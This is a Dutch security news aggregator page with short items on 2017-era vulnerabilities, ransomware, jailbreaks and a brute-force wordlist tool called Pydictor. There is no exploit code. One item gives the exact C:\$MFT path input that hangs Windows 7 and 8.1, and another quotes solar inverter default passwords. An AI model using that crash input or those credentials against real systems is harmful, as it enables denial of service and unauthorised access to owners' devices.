The Dutch HackInfo

Information about Hacking, Security & Tweaking

Filter
  • spambotEen onderzoeker die bekendstaat onder de naam Benkow heeft op een Nederlandse server 711 miljoen e-mailadressen gevonden die worden gebruikt door de Onliner-spambot. Troy Hunt, van de site Have I Been Pwned, heeft de database aan zijn collectie toegevoegd.

    Hunt schrijft dat mensen daarom nu kunnen controleren of hun e-mailadres in de gegevens voorkomt. Zijn eigen adres staat er in ieder geval twee keer in, zonder dat hij weet hoe het daar terecht is gekomen. Omdat de database met e-mailadressen voor een deel is samengesteld door scraping, is hij niet geheel zuiver. Daardoor is het aantal van 711 miljoen adressen volgens Hunt 'technisch correct, maar zullen er in werkelijkheid minder echte personen in de data voorkomen'.

  • goolge apkDe Nederlandse scholier AmirZ heeft een update uitgebracht voor zijn Pixel-launcher, waarmee diverse functies van Android Oreo beschikbaar komen voor mensen met een toestel dat Android 6.0 of hoger draait. Launcher3 is gebaseerd op de launcher in Android 8.0.

    AmirZ maakte de release van de update bekend via Reddit. Hij heeft naar eigen zeggen sinds Android 8.0 begin deze week verscheen, non-stop gewerkt om de 2.0-update voor zijn launcher mogelijk te maken. In de update zit onder meer de functie Notification Dots, waarmee gebruikers via een stip bij het icoon zien of een app een notificatie klaar heeft staan. Met een lange druk op het icoon is die notificatie vervolgens te zien. De functie werkt niet alleen op Android 8.0, maar is in de launcher beschikbaar voor gebruikers van Android 6.0 en hoger, dankzij een backport van die functie.

  • hp logoHP heeft een waarschuwing afgegeven voor een ernstig beveiligingslek in een tool waarmee HP-servers op afstand worden beheerd. Via de kwetsbaarheid in Integrated Lights-out 4 (iLO 4) kan een aanvaller op afstand toegang tot servers krijgen en daarop willekeurige code uitvoeren.

    Vanwege de impact van de kwetsbaarheid adviseert HP om zo snel als mogelijk in actie te komenIntegrated Lights-out is een technologie om HP-servers op afstand mee te beheren. De iLO-kaart heeft een aparte netwerkverbinding en een eigen ip-adres, waarmee via https verbinding kan worden gemaakt. Vervolgens is het onder andere mogelijk om de server te resetten, in te schakelen en de remote system console of command-line interface te benaderen.

  • robo hack logoBeveiligingsonderzoekers van het bedrijf IOActive hebben gewaarschuwd dat eerder geconstateerde kwetsbaarheden in de beveiliging van consumentenrobots en industriële robots nog nauwelijks zijn geadresseerd. De robots zijn simpel te hacken om ze schade te laten aanrichten.

    De onderzoekers hebben in januari een vijftigtal kwetsbaarheden aangetroffen, maar slechts in enkele gevallen blijken de beveiligingsissues te zijn aangepakt. Volgens medewerkers van IOActive is het hierdoor nog altijd redelijk eenvoudig voor hackers om de robots in te zetten om hun gebruikers te bespioneren. Daarnaast kunnen bepaalde ingebouwde beveiligingsmechanismen worden uitgeschakeld waardoor de robots hevig kunnen bewegen en een gevaar kunnen vormen voor nietsvermoedende omstanders. De onderzoekers stellen echter dat ze nog geen signalen hebben opgevangen dat de kwetsbaarheden ook daadwerkelijk worden misbruikt door hackers.

  • drupal securityEr is een belangrijke beveiligingsupdate voor Drupal 8 verschenen die ernstige kwetsbaarheden verhelpt waardoor een aanvaller in het ergste geval de content van websites kon verwijderen, aanpassen of zelf aanmaken. Ook was het mogelijk om zonder de juiste rechten reacties te plaatsen.

    De beveiligingsproblemen bevinden zich alleen in versie 8 van Drupal en zijn in Drupal 8.3.7 verholpen. Deze versie bevat alleen beveiligingsupdates en introduceert geen nieuwe features of andere aanpassingen. Drupal adviseert webmasters en beheerders om de update "meteen" te installeren. Drupal is na WordPress en Joomla het meestgebruikte contentmanagementsysteem voor websites met een marktaandeel van 4,7 procent, aldus W3Techs.

    Bron: Security.nl

  • Pydictor is een krachtige en nuttige hacker 'dictionary' ten gebruiken bij een brute-force aanval.  Waarom pydictor gebruiken? 

    1. Het kan je altijd helpen
    U kunt pydictor gebruiken om een 'normale' woordenlijst te genereren, een aangepaste woordenlijst op basis van webinhoud, een social engineering woordenlijst, enzovoort. Je kunt het ingebouwde gereedschap pydictor gebruiken om veilig te verwijderen, samenvoegen, uniek, samenvoegen en uniek, tellen woordfrequentie om de woordenlijst te filteren. Bovendien kunt je de woordenlijst ook opgeven en '-tool handler' gebruiken om je woordenlijst te filteren. 

    2. Uitgebreid te configureren
    Er kunnen zeer geavanceerde en ingewikkelde woordenlijst mee gemaakt worden door meerdere configuratiebestanden te wijzigen, het eigen woordenboek aan te passen, gebruik te maken van 'leet' encoding, filteren op lengte,  verschillende chararater sets, reguliere expressies etc.
  • amiga500Als je ergens nog een oude Amiga hebt staan, bijvoorbeeld een 500, 1000 of 2000, dan is er een kansje om deze weer nieuw leven in te blazen. Een aantal fans heeft een nieuwe accelerator gebouwd die het apparaat uit de jaren tachtig naar nieuwe hoogtes moet tillen.

    Voor wie geen Amiga meer in huis heeft, is er ook een standalone-accelerator. De bordjes worden gemaakt door Apollo Team, dat zijn nieuwe creatie de naam Vampire V4 heeft gegeven. Deze heeft een Altera Cyclone V-fpga als basis en beschikt over 512MB werkgeheugen. Dat lijkt niet veel, maar is nog steeds een stuk meer dan bijvoorbeeld de 256kB van een Amiga 1000. Dat systeem draaide op een Motorola 68000-cpu op ongeveer 7MHz. Met de accelerators zijn bestaande systemen te voorzien van een upgrade.

  • zonnepaneelVele duizenden omvormers van zonnepanelen bevatten kwetsbaarheden die te misbruiken zijn om de panelen op afstand uit te schakelen. Dat beweert een beveiligingsonderzoeker. Het ministerie van Economische Zaken onderzoekt de claims.

    Onderzoeker Willem Westerhof van het Haarlemse beveiligingsbedrijf ITsec onderzocht omvormers van marktleider SMA en ontdekte een reeks beveiligingsproblemen. Onder andere wijst hij tegenover De Volkskrant op het risico van het gebruik van standaard wachtwoorden.

    In een document van SMA staat dat het wachtwoord voor 'gebruikers' standaard op '0000' staat en voor 'installateurs' is dat '1111'. Gebruikers kunnen informatie uitlezen en basisinstellingen aanpassen, installateurs kunnen ook installatieparameters wijzigen. Volgens Westerhof wordt de gebruiker niet gevraagd zijn wachtwoord aan te passen. In het installatiedocument staan wel aanbevelingen over het wijzigen van wachtwoorden.

  • webdeveloper extensionOpnieuw zijn aanvallers er in geslaagd om via een phishingaanval de controle over een populaire Chrome-extensie te krijgen en er adware aan toe te voegen Het gaat om de Web Developer-extensie die webontwikkelaars allerlei tools biedt. De browseruitbreiding heeft meer dan 1 miljoen gebruikers.

    Via Twitter laat ontwikkelaar Chris Pederick weten dat hij in een phishingaanval trapte waardoor de aanvallers toegang tot het ontwikkelaarsaccount kegen. Via deze toegang werd er een kwaadaardige versie in de Chrome Store geupload.

  • psvita logoDe jailbreakmethode voor de PS Vita die gebruikers in staat stellen om homebrew-software te draaien, is verbeterd, waardoor deze permanent zou moeten werken. Een eerdere versie van de hack moest nog bij elke reboot opnieuw toegepast worden.

    Het gaat om de zogenaamde Henkaku-jailbreak, waarvan een nieuwe versie is verschenen. Op de bijbehorende website staan de instructies om de hack toe te passen. Deze zogenaamde Henkaku Enso-jailbreak blijft actief nadat de PS Vita opnieuw wordt opgestart, in tegenstelling tot een eerdere versie van de software.

  • ransomwareSecuritybedrijf Malwarebytes heeft een gratis decryptietool voor oudere versies van de Petya-ransomware ontwikkeld en beschikbaar gemaakt. Via de tool is het mogelijk om versleutelde schijven en bestanden kosteloos te herstellen. De Petya-variant die op 27 juni jongstleden wereldwijd voor veel schade zorgde is niet met de tool te ontsleutelen.

    De eerste versie van Petya verscheen vorig jaar maart en viel op omdat het de Master File Table van de harde schijf versleutelde, waardoor de machine niet meer konden worden opgestart. Niet veel later verschenen er verschillende varianten. Zo was er een Petya-versie die als back-up de Mischa-ransomware installeerde voor het versleutelen van bestanden en verscheen er een variant genaamd GoldenEye.

  • SymantecOnderzoeker Hanno Bock is erin geslaagd om Symantec een geldig ssl-certificaat via een vervalste privésleutel in te laten trekken. Bij ssl-certificaten wordt er met een privé en publieke sleutel gewerkt. Als de privésleutel gecompromitteerd raakt is de uitgever van het ssl-certificaat verplicht om het in te trekken.

    Een aanvaller kan de gecompromitteerde privésleutel namelijk gebruiken om internetgebruikers mee aan te vallen. Bock wilde kijken of certificaatautoriteiten die ssl-certificaten uitgeven gerapporteerde gecompromitteerde privésleutels wel goed controleren. Anders zou een aanvaller een vervalste privésleutel van een willekeurige website kunnen melden, waarna het certificaat van die website wordt ingetrokken.

  • Microsoftlogo

    MicroSoft
    Microsoft heeft vanavond updates uitgebracht die 54 beveiligingslekken in de eigen software verhelpen, waaronder in Windows, Office, WordPad, Internet Explorer en Edge. Vier van de kwetsbaarheden waren al bekend voordat de updates van Microsoft verschenen, maar zijn volgens de softwaregigant niet aangevallen. Er is dan ook geen sprake van zogeheten zero-days.

    Via deze vier beveiligingslekken (CVE-2017-8584, CVE-2017-8587, CVE-2017-8

    602 en CVE-2017-8611) was het mogelijk om gebruikers van IE en Edge naar gespoofte websites te sturen, het systeem via Windows Verkenner vast te laten lopen en kon een aanvaller de Microsoft HoloLens overnemen door hier een wifi-pakketje naar toe te sturen. Verder heeft Microsoft ook een ernstige kwetsbaarheid in WordPad verholpen. Door een gebruiker een kwaadaardig bestand te laten openen had een aanvaller willekeurige code op het systeem kunnen uitvoeren. Ook is de embedded Flash Player in IE11 en Edge gepatcht. De updates zullen op de meeste systemen automatisch worden geïnstalleerd.

  • GnuPG logoOnderzoekers van de TU Eindhoven en verschillende andere buitenlandse universiteiten hebben een kwetsbaarheid in een encryptiebibliotheek van GnuPG ontdekt waardoor het mogelijk is om in bepaalde gevallen een RSA-encryptiesleutel te achterhalen, zo blijkt uit een recent gepubliceerd rapport (pdf).

    GnuPG is een gratis implementatie van de OpenPGP-standaard die wordt gebruikt voor het versleutelen van data en communicatie. De onderzoekers bedachten een sidechannel-aanval tegen Libgcrypt, een encryptiebibliotheek waar GnuPG gebruik van maakt. De bibliotheek blijkt informatie te lekken die door een aanvaller kan worden gebruikt om de rsa-encryptiesleutel te reconstrueren. Hiermee is het vervolgens mogelijk om informatie te ontsleutelen. Om de aanval uit te voeren moet een aanvaller wel willekeurige software kunnen uitvoeren op de hardware waar de RSA-encryptiesleutel wordt gebruikt.

  • wordpress securityGebruikers van de WordPress-plug-in WP Statistics zijn gewaarschuwd voor een ernstig beveiligingslek waardoor een aanvaller websites volledig kan overnemen. WP Statistics is op meer dan 300.000 websites geïnstalleerd en geeft webmasters uitgebreide informatie en statistieken over websitebezoekers.

    De plug-in bleek gebruikersinvoer niet goed te filteren, waardoor een SQL injection-aanval mogelijk is. Een aanvaller kon zo toegang tot gevoelige informatie in de database krijgen en de WordPress-installatie compromitteren, zo waarschuwt securitybedrijf Sucuri. Om de aanval uit te voeren moet de aanvaller wel over een "subscriber-account" beschikken. Webmasters en beheerders krijgen het advies om te updaten naar WP Statistics 12.0.8 waarin het probleem is verholpen.

    Bron: Security.nl

  • Petya ransomware Dinsdag zijn diverse bedrijven en organisaties in onder andere India, Oekraine, Rusland, het Verenigd Koninkrijk en ook Nederland getroffen door ransomware, vermoedelijk de software Petya. Net als WannaCry lijkt Petya gebruik te maken van de Eternalblue-exploit bij de verspreiding.

    De eerste meldingen over de verspreiding begonnen bij claims dat banken, energiemaatschappijen, tv-stations en bedrijven in Oekraïne getroffen werden door een internetaanval. Onder andere de centrale bank van het land en vliegtuigbouwer Antonov kregen met de malware te maken. De overheid van Oekraïne wees volgens de Kyiv Post met de beschuldigende vinger naar Rusland, maar ook uit dat buurland kwamen berichten van aanvallen, onder andere op de servers van oliemaatschappij Rosneft.

  • Windows DefenderTavis Ormandy, beveiligingsonderzoeker bij Googles Project Zero, heeft opnieuw een lek gevonden in de onderliggende anti-malware-engine van Windows Defender. Microsoft heeft het lek volgens de onderzoeker gedicht.

    Ormandy meldt dat hij dit lek met behulp van een fuzzer vond in de Malware Protection Engine, oftewel MsMpEng, van Windows. Met behulp van een fuzzer kan een programma geautomatiseerd van willekeurige data of gedeeltelijk geldige inputs worden voorzien. Zo is het mogelijk om vast te stellen of het programma op een onverwachte manier reageert, bijvoorbeeld door te crashen. Via deze weg vond Ormandy een heap corruption in een api, die volgens hem een 'krachtige aanzet voor een exploit' vormt. Het zou niet moeilijk zijn om er gebruik van te maken.

  • drupal securityDe ontwikkelaars van het populaire contentmanagementsysteem (cms) Drupal waarschuwen voor een ernstig beveiligingslek waardoor aanvallers websites kunnen overnemen en adviseren de update die het probleem verhelpt direct te installeren. In totaal gaat het om drie kwetsbaarheden die zijn verholpen.

    Via het ernstige lek kon een aanvaller willekeurige code uitvoeren en zo volledige controle over de website krijgen. De overige twee kwetsbaarheden zijn minder ernstig en maken het mogelijk voor gebruikers die bestanden kunnen uploaden om die vervolgens aan te passen. Daarnaast konden bestanden die door anonieme gebruikers werden geupload door andere anonieme gebruikers worden bekeken. Drupal-beheerders krijgen het advies om direct te updaten naar Drupal 7.56 of 8.3.4.

  • malwareEen bekende malwarefamilie die gegevens voor internetbankieren steelt blijkt machines via UPnP in proxy-servers te veranderen. Daarvoor waarschuwt securitybedrijf McAfee. Volgens de beveiliger is QakBot, zoals de malware wordt genoemd, de eerste malware die besmette machines als https-gebaseerde controleservers inzet. QakBot doet dit om de werkelijke locatie van de controleserver te verbergen.

    QakBot is al geruime tijd actief en is ontwikkeld om gegevens voor internetbankieren en andere waardevolle data te stelen. De malware maakt echter ook gebruik van universal plug and play (UPnP) om poorten open te zetten, zodat inkomende verbindingen van iedereen op het internet worden toegestaan om met de besmette machine te communiceren. Beveiligingsexperts waarschuwen al geruime tijd voor de risico's van UPnP en vorig jaar adviseerde de FBI om het uit te schakelen.

  • PDF redact ToolEen Hongaarse beveiligingsonderzoeker heeft een bestaande tool voor het opschonen van pdf-bestanden aangepast zodat ook verborgen watermerken worden verwijderd. Deze week werd bekend dat een klokkenluidster die een vertrouwelijk NSA-rapport lekte waarschijnlijk is gevonden via het watermerk dat kleurenlaserprinters aan uitdraaien toevoegen.

    Het NSA-rapport werd door de klokkenluidster via de post naar nieuwsorganisatie The Intercept gestuurd, dat het vervolgens scande en als pdf-document publiceerde. Het watermerk was ook in het pdf-document terug te vinden. The Intercept is een uitgifte van First Look Media, dat al geruime tijd een tool aanbiedt genaamd "PDF Redact Tools", om metadata uit documenten te verwijderen voordat die worden gepubliceerd.

  • androidBeveiligingsbedrijf Kaspersky heeft Android-malware ontdekt, die het zelf aanduidt als de Dvmap-trojan. Deze zogenaamde rooting-malware onderscheidt zich van andere varianten doordat hij in staat is om kwaadaardige code te injecteren.

    Onderzoeker Roman Unucheck legt uit dat de malware sinds september 2016 ongeveer honderd keer naar Googles Play Store is geüpload en in totaal 50.000 keer is gedownload. Na een melding door Kaspersky is de Dvmap-trojan, die onder meer in de Play Store aanwezig was onder de naam colourblock, door Google verwijderd.

  • windows 7Het Nationaal Cyber Securit Centrum (NCSC) van de overheid heeft gewaarschuwd voor een kwetsbaarheid in Windows die afgelopen maandag door een Russische programmeur openbaar werd gemaakt en ervoor zorgt dat computers met Windows 7 of Windows 8.1 kunnen crashen.

    Het probleem doet zich voor bij het opvragen van $MFT (Master File Table)-bestanden, die zich in alle NTFS-volumes bevinden. Het bestand houdt metadata van alle bestanden op het volume bij, zoals hun locatie, en is onzichtbaar voor gebruikers. Ook voor de meeste programma's is het niet toegankelijk. Windows blokkeert het openen van het bestand, maar als de bestandsnaam als een directorynaam wordt gebruikt, bijvoorbeeld C:\$MFT\abc, zal Windows het bestand vergrendelen en niet meer vrijgeven. Alle volgende operaties van het besturingssysteem wachten echter totdat het bestand wordt vrijgegeven.

  • ransomwareNa de decryptietool voor Windows XP-systemen die door de WannaCry-ransomware zijn getroffen is er nu ook een tool voor besmette Windows 7-gebruikers verschenen. De tool heet wanakiwi en is ontwikkeld door de Franse beveiligingsonderzoeker Benjamin Delpy.

    Net als de WannaKey-tool voor Windows XP haalt wanakiwi informatie uit het geheugen van een besmette computer om de decryptietool te maken. Om bestanden op een besmette computer te versleutelen genereert WannaCry een RSA private key. De priemgetallen die voor het genereren van deze sleutel zijn aangemaakt kunnen in het geheugen achterblijven. Door deze priemgetallen uit het geheugen uit te lezen kan de decryptiesleutel worden gemaakt en is het mogelijk voor slachtoffers om zonder te betalen hun versleutelde bestanden te ontsleutelen.

  • processor hackHet onlangs ontdekte beveiligingslek in zakelijke Intel-processors maakt het mogelijk om uitgeschakelde computers volledig over te nemen, zo hebben de onderzoekers van beveiligingsbedrijf Embedi laten weten die de kwetsbaarheid in februari ontdekten en in maart aan Intel rapporteerden.

    Embedi heeft nu meer details over het beveiligingslek vrijgegeven, dat volgens de onderzoekers de eerste in zijn soort is. De kwetsbaarheid bevindt zich in de Active Management Technology (AMT). Intel AMT is een feature van Intel-processoren met Intel vPro-technologie en maakt het mogelijk om systemen op afstand te beheren. Om ongeautoriseerde toegang te voorkomen worden er verschillende authenticatiemethodes gebruikt. Een logicafout maakt het echter mogelijk om zonder wachtwoord toegang tot Intel AMT te krijgen.

  • wordpress securityEen beveiligingslek in het populaire contentmanagementsysteem WordPress maakt het mogelijk voor een aanvaller om het wachtwoord van gebruikers te resetten en in het ergste geval de e-mail met de resetlink te onderscheppen. Het probleem werd bijna een jaar geleden door onderzoeker Dawid Golunski bij WordPress gerapporteerd, maar is nog altijd niet gepatcht.

    Het probleem is dat een aanvaller de afzender van de resetmails die WordPress-sites versturen kan aanpassen. Zodoende kan een aanvaller voor de From- en Return-Path-velden zijn eigen domein en e-mailadres opgeven. De aanvaller moet in dit geval nog wel de resetmail in handen zien te krijgen, aangezien die nog altijd naar het e-mailadres van de WordPress-beheerder wordt gestuurd.

  • intel server chipsets management engineIntel heeft een waarschuwing afgegeven voor een ernstig beveiligingslek dat sinds 2008 in processors aanwezig is en waardoor systemen op afstand kunnen worden overgenomen. Zoals gisteren al gemeld bevindt de kwetsbaarheid zich in de Intel Active Management Technology (AMT), Standard Manageability (ISM) en Small Business Technology. Volgens Intel lopen consumentencomputers met een Intel-processor geen risico.

  • android open portPoorten die door mobiele applicaties worden opengezet kunnen als backdoor in Androidtelefoons fungeren. Dat heeft een groep onderzoekers van de universiteit van Michigan ontdekt. De onderzoekers hebben honderden Android apps ontdekt die poorten op smartphones open laten. Volgens hen is er sprake van een wijdverbreid beveiligingsprobleem waardoor aanvallers contactgegevens, inloggegevens, foto's en andere gevoelige data kunnen stelen, alsmede malware kunnen installeren.

  • lara croftEen modder heeft een browserversie van het originele Tomb Raider gepubliceerd. Via de browser is een deel van de game uit 1996 speelbaar. De browsergame is vanuit een eerstepersoonsperspectief of derdepersoonsperspectief te spelen.

    Het project OpenLara is een opensourceproject met een aangepaste engine. De modder begon in 2016 met het project. De gemaakte versie is samengesteld via Emscripten en ondersteunt WebGL, waardoor het in webbrowsers speelbaar is.

  • squirrel mail logoEr bevindt zich een ernstig beveiligingslek in de webmailsoftware SquirrelMail waardoor een aanvaller op afstand de server waar de applicatie op draait kan overnemen. Er is nog geen update beschikbaar. De software blijkt gebruikersinvoer niet goed te "escapen" als Sendmail wordt gebruikt voor het versturen van mail. Een aanvaller die over inloggegevens beschikt kan hiervan misbruik maken en het systeem waarop SquirrelMail draait compromitteren.

  • linksys logoNetwerkfabrikant Linksys waarschuwt eigenaren van 25 verschillende routermodellen om het gastnetwerk uit te schakelen. De apparaten bevatten namelijk ernstige beveiligingslekken waarvoor nog geen update beschikbaar is en waardoor een aanvaller de router kan overnemen.

    De in totaal 10 verschillende kwetsbaarheden werden door beveiligingsbedrijf IOActive gevonden. Zes van de beveiligingslekken zijn op afstand door een niet ingelogde aanvaller aan te vallen. Daarnaast is het mogelijk om een denial of service te veroorzaken waarbij de router niet meer reageert en zichzelf herstart. Ook kan een aanvaller de wps-pincode van de wifi-verbinding achterhalen, de firewallconfiguratie benaderen, ftp-instellingen uitlezen en de smb-serverinstellingen achterhalen.

  • drupal securityMeer dan 120.000 websites die van het Drupal-platform gebruikmaken lopen risico om te worden gehackt doordat ze een module hebben geïnstalleerd die 4 jaar lang niet werd ondersteund. Het gaat om de References-module waarmee referenties tussen nodes kunnen worden toegevoegd.

    De laatste update van de module dateerde van februari 2013. Toch hebben meer dan 120.000 websites deze module geïnstalleerd. Op 12 april meldde het Drupal-beveiligingsteam dat er een ernstig lek in de module aanwezig is.

  • magento logoMeer dan 200.000 webwinkels die de Magento-webwinkelsoftware gebruiken zijn kwetsbaar door een beveiligingslek waardoor een aanvaller het systeem volledig kan overnemen en een update is nog niet beschikbaar. Dat laat beveiligingsbedrijf DefenseCode in een advisory weten (pdf).

    Het bedrijf voerde een audit van de Magento Community Edition uit en vond daarbij een kwetsbaarheid in het uploaden van bestanden waardoor een aanvaller op afstand code kan uitvoeren. Via het lek is het mogelijk om het systeem volledig te compromitteren, waaronder de database met klantgegevens, creditcardnummers en andere betaalgegevens.

  • DBPOWER U8181A wifi quadcopterEen beveiligingslek in een wifi-drone die over een camera beschikt en waarmee opnames vanuit de lucht kunnen worden gemaakt kan een aanvaller toegang tot videobeelden en andere bestanden geven. De kwetsbaarheid is aanwezig in de DBPOWER U8181A wifi-quadcopter. De drone beschikt over een niet gedocumenteerde ftp-server die via het lokale wifi-netwerk van de drone voor iedereen toegankelijk is.

    De ftp-server laat gebruikers namelijk zonder wachtwoord inloggen en biedt volledige schrijf- en leesrechten voor anonieme ingelogde gebruikers. Via de ftp-toegang kan een gebruiker in de buurt van de drone willekeurige bestanden lezen, zoals videobeelden en foto's.

  • Broadcom wifI chipset hack

    Verschillende Android-toestellen en iPhones waren te hacken door een lek in een veelgebruikte wifi-chip van het bedrijf Broadcom. 

    Het lek, dat werd aangetroffen door een onderzoeker van Google, maakte het mogelijk om kwaadaardige software op een smartphone te laten draaien, zonder dat de eigenaar van de telefoon daar ook maar iets voor hoefde te doen. De aanvaller moest alleen met hetzelfde wifi-netwerk als het doelwit verbonden zijn.

  • lastpass logoLastPass heeft een ernstig beveiligingslek in de wachtwoordmanager gedicht waardoor kwaadaardige websites wachtwoorden konden stelen en in het ergste geval ook de systemen van gebruikers konden overnemen. De kwetsbaarheid was door Google-onderzoeker Tavis Ormandy ontdekt.

    De onderzoeker had eerder in maart ook al twee kwetsbaarheden in de wachtwoordmanager gevonden waardoor gebruikers konden worden aangevallen. Volgens LastPass zullen de meeste gebruikers de update automatisch ontvangen. Het ontwikkelteam van LastPass heeft een analyse van het lek online gezet.

  • appleApple heeft voor verschillende producten updates uitgebracht, waaronder iOS, macOS en Safari, die meerdere kwetsbaarheden verhelpen waardoor een aanvaller in het ergste geval het onderliggende systeem had kunnen overnemen of encryptiewachtwoorden had kunnen stelen.

    IOS 10.3 verhelpt in totaal 84 beveiligingslekken. Via de kwetsbaarheden had een aanvaller het Apple ID van een vergrendeld scherm kunnen aflezen, maakte het openen van een kwaadaardig audio-, font- of jpeg-bestand, kwaadaardig certificaat of het bezoeken van een kwaadaardige website het uitvoeren van willekeurige code mogelijk. Daarnaast hadden kwaadaardige websites de adresbalk kunnen spoofen.

  • cisco logoNetwerkapparatuurfabrikant Cisco heeft een kritiek lek in de Vault 7-dump gevonden, die onlangs werd gepubliceerd door WikiLeaks. De kwetsbaarheid treft zo'n driehonderd verschillende Cisco-switches die zijn voorzien van IOS en IOS XE-software. Er is nog geen patch.

    Het lek, met kenmerk cve-2017-3881, maakt het mogelijk dat een niet ingelogde aanvaller op afstand willekeurige code op het apparaat kan uitvoeren en het op die manier kan overnemen. Omdat er op dit moment nog geen patch of workaround beschikbaar is, adviseert het bedrijf om bij kwetsbare switches de toegang via telnet uit te schakelen.

  • Ubiquityi logoOnderzoekers hebben een beveiligingslek in de netwerkproducten van Ubiquiti Networks onthuld waardoor een aanvaller de apparaten en in het ergste geval het gehele netwerk kan overnemen. Een update is echter nog niet beschikbaar. Het gaat om command-injectie in de beheerdersinterface.

    Een aanvaller kan dit op afstand uitbuiten door gebruikers een link te laten openen of een kwaadaardige pagina te laten bezoeken. "De gehele aanval is via een enkele GET-request uit te voeren en is zeer eenvoudig, aangezien er geen bescherming tegen cross-site request forgery (csrf) is", aldus Thomas Weber van beveiligingsbedrijf SEC Consult. "Als het Ubiquiti-apparaat als router of firewall fungeert, kan de aanvaller via deze kwetsbaarheid het gehele netwerk overnemen."

  • Ubiquityi logoOnderzoekers hebben een beveiligingslek in de netwerkproducten van Ubiquiti Networks onthuld waardoor een aanvaller de apparaten en in het ergste geval het gehele netwerk kan overnemen. Een update is echter nog niet beschikbaar. Het gaat om command-injectie in de beheerdersinterface.

    Een aanvaller kan dit op afstand uitbuiten door gebruikers een link te laten openen of een kwaadaardige pagina te laten bezoeken. "De gehele aanval is via een enkele GET-request uit te voeren en is zeer eenvoudig, aangezien er geen bescherming tegen cross-site request forgery (csrf) is", aldus Thomas Weber van beveiligingsbedrijf SEC Consult. "Als het Ubiquiti-apparaat als router of firewall fungeert, kan de aanvaller via deze kwetsbaarheid het gehele netwerk overnemen."

  • dlink logoTwee beveiligingslekken in routers van fabrikant D-Link maken het mogelijk voor een aanvaller om op afstand het beheerderswachtwoord van het apparaat te achterhalen en een update is nog niet beschikbaar. De eerste kwetsbaarheid bevindt zich in de remote inlogpagina van het apparaat.

    Normaliter moet er een wachtwoord worden ingevoerd om toegang tot de beheerderpagina's te krijgen. Het blijkt echter mogelijk te zijn om de authenticatie te omzeilen en deze pagina's zonder geldige login op te vragen. Het gaat onder andere om de pagina tools_admin.asp, waar de tweede kwetsbaarheid zich bevindt. Deze pagina bevat namelijk het beheerderswachtwoord.

  • nitendo switch hack 2Een hacker is er in geslaagd de Nintendo Switch te hacken door een bestaande webkit-exploit in te zetten tegen de browser van de console. Een ontwikkelaars heeft een proof-of-concept uitgebracht op basis van de kwetsbaarheid.

    De hacker qwertyoruiop heeft op Twitter een afbeelding geplaatstmet de vermelding dat hij een oude webkit-exploit opnieuw gebruikt heeft. De hacker werkte eerder met succes aan iOS-jailbreaks en was volgens Wololo ook verantwoordelijk voor een PS4 1.76-exploit.

  • av tech logoOnderzoekers hebben nieuwe Linux-malware gevonden die ip-camera's, digitale videorecorders en netwerkvideorecorders van fabrikant AVTech infecteert via een beveiligingslek dat eind vorig jaar openbaar werd gemaakt. De apparaten bleken 14 verschillende kwetsbaarheden te bevatten.

    De onderzoekers waarschuwden de Taiwanese fabrikant op 19 oktober 2015, maar ontvingen geen reactie. In totaal werd er vier keer geprobeerd om contact op te nemen, maar alle keren zonder succes. Daarop werd besloten een jaar later de details vrij te geven. Op het moment van de openbaarmaking waren er zo'n 130.000 kwetsbare apparaten via internet te vinden. Eén van de onthulde kwetsbaarheden in een cgi-bestand wordt nu gebruikt om commando's op het apparaat uit te voeren.

  • WD HackedSometimes at Exploitee.rs, we look for fun devices to hack and sometimes the devices find us. Today we’re going to talk about a recent time where we found ourselves in the latter situation and our experience with the Western Digital series of Networked Attached Storage devices.

    In the middle of last year I (Zenofex) began looking for a NAS that provided hardware decoding through my currently prefered media player, Plex. After a bit of research I ordered a Western Digital “MyCloud” PR4100. This device met all the requirements of what I was looking for and came highly recommended by a friend. After adding the NAS to my network and visiting the device’s admin page for the first time, I grew weary of adding a new device to my network without giving it a proper audit. So, I logged in, enabled SSH access, and looked at how the web server functionality of the device worked.

  • xbox live

    Microsoft heeft op de Game Developers Conference het Xbox Live Creators-programma aangekondigd. Dit moet iedereen in staat stellen om als ontwikkelaar UWP-games tegelijk op Windows 10 en de Xbox One uit te brengen.

    In de aankondiging schrijft Microsoft dat het programma erop is gericht om iedereen in staat te stellen 'op een nieuwe manier snel Xbox Live-games te publiceren op Windows 10 en de Xbox One'. Zo is het mogelijk om Xbox Live-functies in te bouwen in UWP-games en deze vervolgens te publiceren. Uit een speciale pagina blijkt dat het daarbij gaat om functies als het inloggen met Xbox Live, het leaderboard en verschillende sociale functies. Ontwikkelaars die toegang tot meer functies willen, zoals achievements en multiplayer, moeten dat doen via het aparte ID@Xbox-programma.

  • zdnet logoEen hacker heeft zichzelf toegang verschaft tot de Belgische website van ZDnet. Er verscheen een nieuwsbericht op de website waarin wordt gemeld dat een Koerdische hacker de verantwoordelijkheid voor de inbraak claimt.

    De voorpagina van ZDnet.be lijkt grotendeels intact gebleven te zijn, maar de hackers lijken een nieuwsberichtdat al sinds vrijdag online staat te hebben aangegrepen om hun boodschap te plaatsen. De hacker noemt zichzelf MuhmadEmad, en claimt verbonden te zijn aan de Koerdische peshmerga-strijders. Verder heeft de inbreker het font op de webpagina veranderd, maar lijkt de website verder gewoon te blijven functioneren.

  • dlink logoVorig jaar ontdekte een onderzoeker in Zuid-Korea een backdoor en allerlei andere kwetsbaarheden in een router van fabrikant D-Link, maar de update die volgde blijkt een deel van de problemen niet te verhelpen. Zo is de backdoor nog steeds aanwezig, meldt onderzoeker Pierre Kim.

    Kim analyseerde de firmware-update voor de D-Link DWR-932B-router en ontdekte dat niet alleen de backdoor nog steeds aanwezig is, maar ook de eerder aangetroffen backdoor-accounts, alsmede verschillende andere kwetsbaarheden waardoor het apparaat is aan te vallen. "D-Link had vijf maanden nodig om de beveiligingsupdate te ontwikkelen en nu blijkt dat slechts één kwetsbaarheid is verholpen."

  • wordpress securityWordPress informeerde zijn gebruikers woensdag over een ernstig lek, dat het een week geleden samen met drie andere kwetsbaarheden heeft gedicht. De organisatie zegt gebruikers nu pas in te lichten, omdat de veiligheid van miljoenen websites op het spel stond.

    In een blogpost schrijft Aaron Campbell van WordPress dat vorige week naast de patch voor drie bekende kwetsbaarheden de update ook een oplossing voor een vierde kwetsbaarheid bevatte. Deze was aanwezig in versies 4.7 en 4.7.1 en maakte het mogelijk om op afstand de inhoud van een WordPress-pagina of -post aan te passen of te verwijderen. Volgens de organisatie zijn er geen pogingen vastgesteld om het lek te misbruiken.

  • ipcam3Beveiligingsonderzoekers van het bedrijf Exploiteers hebben een lek gevonden in een Smartcam van Samsung, die een aanvaller het apparaat op afstand laat overnemen. Zij hadden Samung eerder al op de hoogte gesteld van kwetsbaarheden in zijn ip-camera's.

